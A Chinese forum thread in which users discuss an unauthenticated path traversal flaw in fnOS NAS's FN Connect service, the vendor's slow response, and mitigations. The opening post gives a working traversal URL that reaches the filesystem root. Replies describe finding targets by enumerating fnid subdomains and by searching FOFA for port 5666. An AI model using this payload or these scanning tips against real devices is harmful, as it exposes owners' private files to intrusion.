打开 FN Connect 随便输入一个 id ,只要撞上了能打开登录页,加上
/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../
直接就到 /了啊
太离谱了
/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../
直接就到 /了啊
太离谱了
 | 1 stinkytofux 1 月 31 日  3 0day 就是这么可怕, 更可怕的是捂盖子, 导致更多人受害. |
 | 2 Tink OP PRO @stinkytofux 官方为什么不强推新版本呢,强制修复漏洞 |
 | 3 Joming 1 月 31 日 TMD 到现在都没发公告!好在公司发现比较早,不然严重泄露信息!再不会用了! |
 | 4 wfhtqp 1 月 31 日 问题是飞牛不当回事,fnid 现在还不暂停,原来没有公网的也全暴漏了 |
 | 5 wfhtqp 1 月 31 日 3 https://club.fnnas.com/forum.php?mod=viewthread&tid=48354 25 年 12 月。。。还有更早的。。。 |
 | 8 labubu 1 天前 via Android 不是绑定手机了吗,打电话发短信给用户呗? |
 | 9 bitkuang 1 天前 via Android 没复现出来,还有别的条件吧 |
 | 10 haoshuaiwang 1 天前 写个脚本跑就行了 {fnid}.fnos.net |
 | 11 baton 1 天前 via Android 1 经历过宝塔后就不敢用国内这些面板,安全性是个大问题 |
 | 12 a9htdkbv 1 天前 via Android 还好我有先见之明,昨天早上关闭 fn connect ,晚上就把整个飞牛虚拟机扬了 |
 | 14 AkinoKaedeChan 1 天前 via Android @emoker https://www.bt.cn/bbs/thread-54666-1-1.html phpMyAdmin 未授权访问 |
 | 15 flyqie 1 天前 via Android 1 是的,之前以为飞牛官方会做紧急的限制,现在看来似乎没有任何限制,不知道是限于架构问题做不了还是不想做。 |
 | 17 emoker 1 天前 @AkinoKaedeChan 感谢大佬 |
| 18 stinkytofux 1 天前  |
 | 19 ryd994 23 小时 3 分钟前 via Android 我相信有很多人就是图个 fnconnect 的方便。这下好了,不能开公网,不能用 fnconnect ,结果还是要自己配置 VPN/zerotier 。 我的 nas 只能通过 VPN 或者 cloudflare tunnel 访问,后者经过 zero trust 的鉴权。所有不登入就能访问的服务(比如 BT )都跑在容器里。 |
 | 21 sardina 16 小时 2 分钟前 2025-12-25 18:06:25 只看该作者回复 感谢反馈我转给负责的同事看看 一个月前就说反馈 结果还没修复。。。 |
 | 22 Curtion 15 小时 50 分钟前 还真是, 直接在 fofa 搜索 5666 端口,随便找一个进去就能访问到文件了。。 我觉得飞牛应该强制关闭 fn connet ,直到用户升级系统。  |
 | 23 MiKing233 15 小时 41 分钟前 |
 | 25 panda188 13 小时 50 分钟前 via Android 不会降本增效,已经把负责这个,会这个的裁了吧? |
 | 26 hatch 11 小时 37 分钟前 作死,估计内部也一团糟,问题流转半天找不到能挑担的人 |
 | 28 povsister 8 小时 10 分钟前 1 好几天了官方反代甚至不愿意上个 WAF 救一救后面的用户。哎 |
 | 29 chinni 7 小时 8 分钟前 其实现在点什么目录基本都 404 也没啥了,但是确实坑,不如直接用 zero trust |
 | 32 someonesnone 3 小时 28 分钟前 @chinni #29 你别直接点链接, 你把目录名手动放在../../xxx 试试... |
Select Language